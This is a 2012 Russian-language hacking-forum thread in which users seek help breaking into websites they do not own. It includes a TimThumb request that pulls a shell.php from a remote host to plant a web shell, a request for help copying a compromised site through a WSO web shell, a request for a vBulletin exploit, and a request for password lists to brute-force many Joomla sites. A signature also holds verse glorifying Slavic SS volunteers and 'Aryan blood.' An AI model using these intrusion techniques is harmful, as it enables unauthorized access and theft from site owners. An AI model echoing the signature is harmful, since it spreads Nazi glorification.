ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

11.06.2012, 23:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
Сообщение от cat1vo
cat1vo said:
А с чего ты взял, что там у тебя инлуд? И какая версия рнр, после обновления 5.3.4 (null байт) уже не работает!
5.2.11 пхп
но раскрутить никак не могу
|
|
|
|

13.06.2012, 02:00
|
|
Guest
Сообщений: n/a
Провел на форуме: 3814
Репутация:
0
|
|
Word press TimThumb Уязвимость
/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable
Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл
Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть
|
|
|
|

13.06.2012, 02:11
|
|
Guest
Сообщений: n/a
Провел на форуме: 214
Репутация:
0
|
|
Есть сайт на Drupal, с него недавно были удалены страницы(ранее существовали, теперь 404). Возможно ли создать(воссоздать) страницы с этими определенными именами? Скажем site/node/12345 - движек, я так понял, создает со случайным номером, а нужно именно с определенным!
|
|
|
|

14.06.2012, 02:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 7074
Репутация:
0
|
|
Вопрос - чем удобнее всего рипать сайт?
Нужна некая программа, которая используя веб-шелл пройдется по указанным каталогам и сохранит файлы.
Ибо права на чтение есть, хочу сохранить для анализа на случай закрытия уязвимостей.
zipнуть и скачать не получается - объемы адские и не дает - "Internal Error", даже если по 1 каталогу выбирать. (Использую WSO)
Судя по всему стоит ограничение на время выполнения и ничего тут не сделать.
Плюс из всех команд на запуск доступно только proc_open
|
|
|
|

15.06.2012, 02:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 97332
Репутация:
38
|
|
Подскажите, есть что под vBulletin 3.6.8
Спасибо
|
|
|
|

15.06.2012, 02:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 225312
Репутация:
-6
|
|
Сообщение от Pirotexnik
Pirotexnik said:
Подскажите, есть что под vBulletin 3.6.8
Спасибо
xss было
|
|
|
|

15.06.2012, 02:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 97332
Репутация:
38
|
|
А можно PoC?)
|
|
|
|

17.06.2012, 23:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
Возникла потребность пробрутить базу сайтов joomla. Так как я новичок в этом, то натолкнулся на такую неприступную, для меня "стену", а опытным деятелям данной сферы это раз плюнуть. Так вот: Нужна база паролей. Желательно проверенная с нормальной "проходимостью"
Заранее превелико благодарен ответившему положительно на мой столь нубский вопрос - просьбу)
|
|
|
|

18.06.2012, 00:26
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
Сообщение от Esse_rationa
Esse_rationa said:
Возникла потребность пробрутить базу сайтов joomla. Так как я новичок в этом, то натолкнулся на такую неприступную, для меня "стену", а опытным деятелям данной сферы это раз плюнуть. Так вот: Нужна база паролей. Желательно проверенная с нормальной "проходимостью"
Заранее превелико благодарен ответившему положительно на мой столь нубский вопрос - просьбу)
какой вопрос - такой ответ, может быть ты имелл ввиду базу паролей от joomla а не сайтов? про Базу паролей напиши лучше в соседнем разделе про хеши, возможно там подскажут что лучше....
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|

18.06.2012, 00:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
Сообщение от HAXTA4OK
HAXTA4OK said:
какой вопрос - такой ответ, может быть ты имелл ввиду базу паролей от joomla а не сайтов? про Базу паролей напиши лучше в соседнем разделе про хеши, возможно там подскажут что лучше....
Возможно. Может я ошибаюсь. Повторюсь: "я пока что в изучении."
1. Софт для брута (именно Joomla) есть. Авторский. В паблике старые версии.
2. К нему прилагается небольшая база паролей (обычный .txt) пароли типа "admin, 12345" и т.д
Так вот той базе паролей для подбора, доверия нет (всего 70кб)
Пробиваемость с неё на уровне 1-max3% от общего кол-ва сайтов.
Собственно первоначальная просьба была направить меня в нужное русло поиска, или Лучше дать базу паролей для брута (пробиваемостью хотя бы 40-60%) Был бы очень благодарен!
Сейчас ориентироваться в обиллии разных баз для брута очень сложно. Их много, а я один ) Все проверить я физически не смогу.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|